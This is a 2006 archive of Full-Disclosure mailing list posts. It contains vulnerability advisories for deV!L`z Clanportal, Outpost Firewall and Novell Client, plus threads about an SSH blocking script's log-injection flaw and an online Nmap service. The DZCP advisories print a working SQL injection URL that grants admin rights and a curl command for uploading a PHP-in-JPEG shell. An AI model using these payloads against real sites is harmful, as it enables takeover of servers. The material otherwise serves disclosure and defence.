E P T / =================================' Check if magic_quotes_gpc is enabled: http:///sites/index.php?show=' If a MySQL error appears or the script dies, it is disabled. Then: http:///sites/index.php?show=-1'+%55NION+%53ELECT+1,+'Admin+Panel\',+level%3d4,+waffe%3d\'SQL+Injection',+2,+3,+' T I M E L I N E (CET) / ========================' 2006-11-23 23:05 started searching 24 0:35 exploited 14:20 advisory finished 17:31 informed vendor that any user can get admin privileges 25 23:00 full disclosure to vendor 27 14:36 hotfix available on vendor website 12-01 10:00 full disclosure to the general public A B O U T T H E A U T H O R / =================================' Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124a at the host scytale.de. T H A N K S / =============' o Kallista o yorn for showing me DZCP and the basics of SQL injections o the DZCP authors for the fun in secure.php From scy-adv at scytale.de Fri Dec 1 09:45:03 2006 From: scy-adv at scytale.de (Tim Weber) Date: Fri, 1 Dec 2006 10:45:03 +0100 Subject: [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b] Message-ID: <200612011045.03740.scy-adv@scytale.de> / -[061124b]- \ | deV!L`z Clanportal - Arbitrary File Upload | \ / S Y N O P S I S / =================' -( access: remote severity: high )- deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it, leading to arbitrary code execution. B A C K G R O U N D / =====================' deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan. A F F E C T E D V E R S I O N S / ===================================' verified on: 1.3.6 possibly vulnerable: <= 1.3.6 fixed in: 1.3.6.1 I M P A C T / =============' The attacker can run own code on the web sever with the same privileges as DZCP itself, enabling her to do almost anything from getting the MySQL password to hosting own files and scripts or getting a shell on the server. P R E R E Q U I S I T I E S / =============================' o the attacker needs a file that is both a valid JPEG or GIF file and valid PHP (or probably other) code D E S C R I P T I O N / =======================' upload/index.php is not checking the file extension of uploaded files. Instead it is simply checking the MIME type (that can be spoofed) and the format of an uploaded image. A skilled attacker could upload an image file that has been specially crafted to contain PHP code and yet be recognized as a valid image. The file will be stored on the server, using a file name supplied by the attacker (ending in .php, for example), and can then be executed via HTTP. W O R K A R O U N D / =====================' Some possibilities: o Add something like this before the "switch" statement in upload/index.php: if (isset($_FILES['file']['name']) && !preg_match('/\.(jpg|gif)$/i', $_FILES['file']['name'])) die(); o Remove upload/index.php or make it inaccessible. o Quit using DZCP. I mean it! There are tons of other vulnerabilites just waiting to be exploited; some of them might be as severe as this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal. P R O O F O F C O N C E P T / =================================' Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or in similar places. Make sure PHP's getimagesize() does not return false and that the file does not throw parse errors or the like when fed to PHP. Then: curl -F 'file=@img.php;type=image/jpeg' 'http:///upload/index.php?action=userpic&do=upload' Then check http:///inc/images/uploads/userpics/.php T I M E L I N E (CET) / ========================' 2006-11-24 2:00 started searching 4:00 exploited 15:05 advisory finished 17:31 informed vendor that anybody can run arbitrary code 25 23:00 full disclosure to vendor 27 14:36 hotfix available on vendor website 12-01 10:45 full disclosure to the general public A B O U T T H E A U T H O R / =================================' Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124b at the host scytale.de. T H A N K S / =============' o Kallista o the cat in the fridge o KHexEditor o the DZCP authors for the fun in secure.php From david at matousec.com Fri Dec 1 10:12:30 2006 From: david at matousec.com (David Matousek) Date: Fri, 01 Dec 2006 11:12:30 +0100 Subject: [Full-disclosure] Outpost Bypassing Self-Protection via Advanced DLL injection with handle stealing Vulnerability Message-ID: <4570000E.8040903@matousec.com> Hello, We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0. Description: The system process services.exe cares about system services. It runs them during the system boot and thus owns full access handles to all system services. Outpost protects all processes against common DLL injection and forbids other processes to manipulate its own service process. However, it does not protect services.exe against Advanced DLL injection that does not rely on writing into the target process memory. It is possible to infect services.exe with a malicious DLL and execute an arbitrary code in this system process. It is also possible to find and use its handle of the outpost.exe process to infect Outpost service process similarly. As a result, the attacker is able to inject an arbitrary code into the Outpost's process and thus bypass any of its security mechanisms. Vulnerable software: * Outpost Firewall PRO 4.0 (971.584.079) * Outpost Firewall PRO 4.0 (964.582.059) * probably all older versions of Outpost Firewall PRO 4.0 * possibly older versions of Outpost Firewall PRO More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-via-Advanced-DLL-injection-with-handle-stealing.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From dudevanwinkle at gmail.com Fri Dec 1 11:48:38 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 06:48:38 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: On 12/1/06, Mike Huber wrote: > first of all, IANAL, but the TOS seem to cover the basics... > None-the-less, my 8-ball sees litigation in their future. portscanning isnt illegal in the states -JP From tonnerre.lombard at sygroup.ch Fri Dec 1 12:17:26 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 13:17:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701925.7060503@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> Message-ID: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> Salut, On Fri, 2006-12-01 at 06:59 -0500, J. Oquendo wrote: > >> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 > >> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' > > > > What if I set my user name to "bikermice from mars"? Are you going to > > blacklist mars then? > > Apparently you are as stupid as your question is. The syntax won't allow > to pass off anything. Try it before responding idiotically Did you even try it? And what exactly in this awk statement would prevent me from inserting mars in this case? The log statement would look like this: Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from mars from 213.134.128.227 In this case, your awk statement checks that argument $6 is "Illegal" (which it is) and argument $9 is "from" (which it is). So it takes $10 and prints it (in this case, mars.) If you check $10 to look like an IP address, I set my username to "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 because it is a valid IP. Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/56baf100/attachment.bin From sil at infiltrated.net Fri Dec 1 12:26:01 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 07:26:01 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> Message-ID: <45701F59.4050502@infiltrated.net> Tonnerre Lombard wrote: > In this case, your awk statement checks that argument $6 is > "Illegal" (which it is) and argument $9 is "from" (which it is). So it > takes $10 and prints it (in this case, mars.) > > If you check $10 to look like an IP address, I set my username to > "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 > because it is a valid IP. > > Tonnerre > So again... Some of you guys need to go back and read before you post.... awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. Is this a difficult concept to understand? Set your host to whatever you would like, its been discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script to ensure no one ever spoofs again. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/9c87af00/attachment.bin From tonnerre.lombard at sygroup.ch Fri Dec 1 12:44:22 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 13:44:22 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701F59.4050502@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> Message-ID: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> Salut, On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote: > So again... Some of you guys need to go back and read before you post.... In this case, the NF wasn't in your original posting, so I could hardly have seen it. Still, there are problems with it, but not security wise... > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' > > Once you try a moronic name insertion it makes the columns more than 10 > rows invalidating it. In that case, your script isn't going to work in most cases. For example, on our router we get: Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 10.1.5.166 port 51558 ssh2 -> more than 10 columns. Also, one of our customers uses user names which consist of two parts which are separated by spaces. This is due to his use of Windows. The users are called e.g. "John Doe", so you do an ssh "John Doe at servername.asdf.ch". In this case, your script fails entirely. Probably a top-down parser isn't really suitable for this. If at all, you should make an attempt to parse from the end of the string. sed can help you there. > Perhaps I should re-write TCP into the script to ensure no one ever > spoofs again. That wouldn't be very useful since the L4Addr doesn't matter much here, as we're dealing with L3addrs... Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/abb811a3/attachment.bin From sil at infiltrated.net Fri Dec 1 12:50:14 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 07:50:14 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <1164977062.39297.49.camel@aspirateur.sygroup-int.ch> Message-ID: <45702506.4070300@infiltrated.net> Tonnerre Lombard wrote: > Salut, > > On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote: > >> So again... Some of you guys need to go back and read before you post.... >> > > In this case, the NF wasn't in your original posting, so I could hardly > have seen it. Still, there are problems with it, but not security > wise... > > >> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' >> >> Once you try a moronic name insertion it makes the columns more than 10 >> rows invalidating it. >> > > In that case, your script isn't going to work in most cases. For > example, on our router we get: > > Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user > asdf from 10.1.5.166 port 51558 ssh2 > > -> more than 10 columns. > > And this is my problem how? The script was written mainly for myself and was passed on as something someone can use at their leisure and expense. "Your script isn't going to work boohoo" Is it not customizable to fit your need. I would think so all it is doing is text processing no brainer there. > Also, one of our customers uses user names which consist of two parts > which are separated by spaces. This is due to his use of Windows. The > users are called e.g. "John Doe", so you do an ssh "John > Doe at servername.asdf.ch". In this case, your script fails entirely > Again... Re-read my previous paragraph. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/5b111b85/attachment.bin From jammer128 at gmail.com Fri Dec 1 12:56:43 2006 From: jammer128 at gmail.com (Jason Miller) Date: Fri, 1 Dec 2006 06:56:43 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> I agree with Dave on this one. Dude Van, I thought it was illegal in the states..? Or am I mistaken? Also, think of this from the ISP's view, do they really want a service port scanning their users? And look at it this way, said target has a proxy server on it, attacker proxies into the proxy and scans the target server with that service, since he is now on the targets IP address, I think you understand what I'm getting at by now. nmap is made to find exploits, that is what this service is going to wind up being abused for (in most cases that i know). On 12/1/06, Dave Moore wrote: > > On 12/1/06, Mike Huber wrote: > > first of all, IANAL, but the TOS seem to cover the basics... However, I > am > > unsure whether they would hold up under strict legal scrutiny. As far > as I > > can tell, they may hold up under US criminal law, but not under civil > law, > > as tort law has its own wonderful little eccentricities. The best > safeguard > > they seem to have is that they must log the source IP of all scan > > requests... As far as I know, anyone who takes the time to read the > nmap > > man page should be able to craft a scan which won't be detected by the > > scanned host (can someone be a definitive source on this point?), and > anyone > > taking malicious action ought to be taking sufficient precautions to > avoid > > detection anyway. None-the-less, my 8-ball sees litigation in their > future. > > All nmap scans are detectable. All port scans are detectable. Just > depends on how hard you're looking. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/34197a40/attachment.html From ltr at isc.upenn.edu Fri Dec 1 13:50:48 2006 From: ltr at isc.upenn.edu (David Taylor) Date: Fri, 1 Dec 2006 08:50:48 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> Message-ID: <01af01c7154f$b518a780$654b5b82@shakuhachi> How do you plan on dealing with all the abuse complaints you get hit with when people use your server to perform unauthorized scans of their networks? ================================================== David Taylor //Sr. Information Security Specialist University of Pennsylvania Information Security Philadelphia PA USA (215) 898-1236 http://www.upenn.edu/computing/security/ ================================================== Shadowserver Foundation Member http://www.shadowserver.org/ -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David Matousek Sent: Tuesday, November 28, 2006 3:19 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Nmap Online Hello, For all Nmap fans, our group have implemented Nmap Online service. Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax. The service is free and can be used immediately, no registration is required. Please direct your questions and suggestions to our emails. Regards, -- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From falco at gentoo.org Fri Dec 1 14:02:26 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:02:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701F59.4050502@infiltrated.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> Message-ID: <20061201140226.GC26621@falco.falcal.net> On Fri, 01 Dec 2006, J. Oquendo wrote: > Tonnerre Lombard wrote: > > > >In this case, your awk statement checks that argument $6 is > >"Illegal" (which it is) and argument $9 is "from" (which it is). So it > >takes $10 and prints it (in this case, mars.) > > > >If you check $10 to look like an IP address, I set my username to > >"bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 > >because it is a valid IP. > > > > Tonnerre > > > > So again... Some of you guys need to go back and read before you post.... ok, you're right, let's go back and let's read again: You mention (from the attached mail, you've written): Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Note that there is no "NF" in this line. > > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' > you're fixing your script when someone shows a security hole, that's a good practice. But don't insult the men who mention the vulnerabilities... They are actually helping you, because you're improving your script thanks to them. > > Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. > Is this a difficult concept to understand? Set your host to whatever you would like, its been > discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script > to ensure no one ever spoofs again. > -- Rapha?l Marichez aka Falco -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/94a90342/attachment.bin From falco at gentoo.org Fri Dec 1 14:04:59 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:04:59 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <20061201140459.GD26621@falco.falcal.net> On Fri, 01 Dec 2006, Raphael Marichez wrote: > You mention (from the attached mail, you've written): sorry, here's your email -- Rapha?l Marichez aka Falco -------------- next part -------------- An embedded message was scrubbed... From: "J. Oquendo" Subject: Re: [Full-disclosure] SSH brute force blocking tool Date: Tue, 28 Nov 2006 11:59:43 -0500 Size: 15396 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.mht -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.bin From dudevanwinkle at gmail.com Fri Dec 1 14:09:25 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> Message-ID: On 12/1/06, Jason Miller wrote: > I agree with Dave on this one. Dude Van, I thought it was illegal in the > states..? Or am I mistaken? http://www.securityfocus.com/news/126 > Also, think of this from the ISP's view, do they > really want a service port scanning their users? And look at it this way, > said target has a proxy server on it, attacker proxies into the proxy and > scans the target server with that service, since he is now on the targets IP > address, I think you understand what I'm getting at by now. nmap is made to > find exploits, that is what this service is going to wind up being abused > for (in most cases that i know). nmap is used to find open ports and fingerprint OS's. What you do with that info is up to you. Here is an example of what is legal vs what isnt: If you scan a machine with nmap from one machine, that is not illegal. If you run 100,00 nmap scans from a distributed botnet and take down their server, thats illegal. If your nmap scan tells you that port 80 is open and you run a nessus scan and find that they are vulnerable to a bug in their webserver is that illegal? I do know If you exploit that weakness and backdoor their machine, you just broke the law, but am unsure about nessus's legality on systems you dont have a get out of jail free card for or own. I have no doubt about nmap though. as long as you dont take down their servers with the scans, you are legit. -JP From sil at infiltrated.net Fri Dec 1 14:09:25 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <45703795.4070002@infiltrated.net> Raphael Marichez wrote: > you're fixing your script when someone shows a security hole, that's a > good practice. But don't insult the men who mention the > vulnerabilities... They are actually helping you, because you're improving > your script thanks to them. > Hello... Some of you guys seriously need to do some reading and refreshing of your browsers... The script was fixed days ago. http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050952.html // SNIPPED Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Would stop the insertion attack and only print out the tench field if fields 5, 6 and 9 match Illegal user from. So that would pretty much minimize the attack on name insertion. If I wanted to I could also make sure that if someone came after field 10, then ignore the entire line: Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 ... SO let me restate. I could modify it to look at lines 5, 6, and 9 ... Take a look at the tenth column and if anything comes after that...Ignore that entire line... Should I have done so, maybe... Will I do so... Maybe... // END SNIP And I fixed it the same day to avoid the insertion of moronic usernames. Read the entire thread. My critiques comes from people who only snip out what is suitable for them to read. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/a194f5ee/attachment.bin From juha-matti.laurio at netti.fi Fri Dec 1 14:34:06 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET) Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> >From the Reuters article: "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. More at http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8 SANS Internet Storm Center (ISC) has issued the following Diary entries, several references included: >From ISC director Marcus H. Sachs: http://isc.sans.org/diary.php?storyid=1900 and "US DHS banking alert" entry released earlier by Johannes Ullrich: http://isc.sans.org/diary.php?storyid=1899 - Juha-Matti From colweb at gmail.com Fri Dec 1 12:48:54 2006 From: colweb at gmail.com (Col) Date: Fri, 1 Dec 2006 12:48:54 +0000 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> "Service unavailable. Please try again later." That was quick! Col. From dswafford at alterhighschool.org Fri Dec 1 14:40:59 2006 From: dswafford at alterhighschool.org (David Swafford) Date: Fri, 01 Dec 2006 09:40:59 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> Message-ID: <456FF8AA.9B1E.0073.0@alterhighschool.org> Maybe it got hacked? ...I wonder if someone probably didn't like all the portscans they got from it (....thinks of Microsoft) and took it out? David. >>> Col 12/1/2006 7:48 am >>> "Service unavailable. Please try again later." That was quick! Col. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ______________________________________________________ Founded in Faith - Preserved with Pride - Sustained by Spirit ______________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/6cb97b56/attachment.html From dh at layereddefense.com Fri Dec 1 10:55:55 2006 From: dh at layereddefense.com (Deral Heiland) Date: Fri, 01 Dec 2006 05:55:55 -0500 Subject: [Full-disclosure] Layered Defense Advisory: Novell Client 4.91 Format String Vulnerability In-Reply-To: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net> References: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net> Message-ID: <7.0.1.0.0.20061201055132.027c4de0@layereddefense.com> ================================================== Layered Defense Advisory 1 December 2006 ================================================== 1) Affected Software Novell Client 4.91 SP2 Novell Client 4.91 SP2 Patch Kit Novell Client 4.91 SP3 Earlier versions may also be vulnerable ================================================== 2) SeverityRating: Low - Medium risk Impact: Read arbitrary memory, denial of service. ================================================== 3) Description of Vulnerability A format string vulnerability was discovered within Novell client 4.91 . The vulnerability is due to improper processing of format strings within NMAS (Novell Modular Authentication Services) Information message window. An attacker who enters special crafted format strings in the Username field at the Novell logon and selects Sequences under the NMAS tab can read data from the winlogon process stack or read from arbitrary memory, and at a minimum cause a denial of service. ================================================== 4) Solution Fix: Presently no patch is available. Work around: Disable NMAS Authentication ================================================== 5) Time Table: 07/15/2006 Reported Vulnerability to Vendor. 08/21/2006 Vendor released Novell Client - 4.91 SP2 Patch Kit which made the vulnerability worse. (This patch made it easier to read arbitrary memory) 09/17/2006 Contacted Vendor about increased risk with SP2 Patch Kit 11/28/2006 Received the following message from Vendor : At this point in time, development has determined this is a very low priority and apparently it will be some time before the issue is addressed. I have reported this to our Security Review Board so development's claim can be re-examined. As such, you certainly have every right to publish your findings at this time. The bug will remain open against the product.  Hopefully this can be fixed in the near future ================================================== 6) CreditsDiscovered by Deral Heiland, www.LayeredDefense.com ================================================== 7) About Layered DefenseLayered Defense, Is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena. http://www.layereddefense.com ================================================== From david at matousec.com Fri Dec 1 14:02:13 2006 From: david at matousec.com (David Matousek) Date: Fri, 01 Dec 2006 15:02:13 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <01af01c7154f$b518a780$654b5b82@shakuhachi> References: <01af01c7154f$b518a780$654b5b82@shakuhachi> Message-ID: <457035E5.8090405@matousec.com> We have set limits to prevent abusing of our service. Yes, one can still scan someone other's network, this is in violation with out Terms of Service. We log every attempt and we are ready to provide these logs to authorities. However, everyone who has Internet access is able to download Nmap and do similar scan. You can do nothing more with our service. There is no damage you can cause with our service even if it is abused. We believe that pros are more than cons here, that people will use our service to fix their issues on their firewalls and networks. -- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ David Taylor wrote: > How do you plan on dealing with all the abuse complaints you get hit with > when people use your server to perform unauthorized scans of their networks? > > > ================================================== > David Taylor //Sr. Information Security Specialist > University of Pennsylvania Information Security > Philadelphia PA USA > (215) 898-1236 > http://www.upenn.edu/computing/security/ > ================================================== > > > Shadowserver Foundation Member > http://www.shadowserver.org/ > > > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David > Matousek > Sent: Tuesday, November 28, 2006 3:19 AM > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Nmap Online > > > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to perform > custom > Nmap scans from our server with only a few 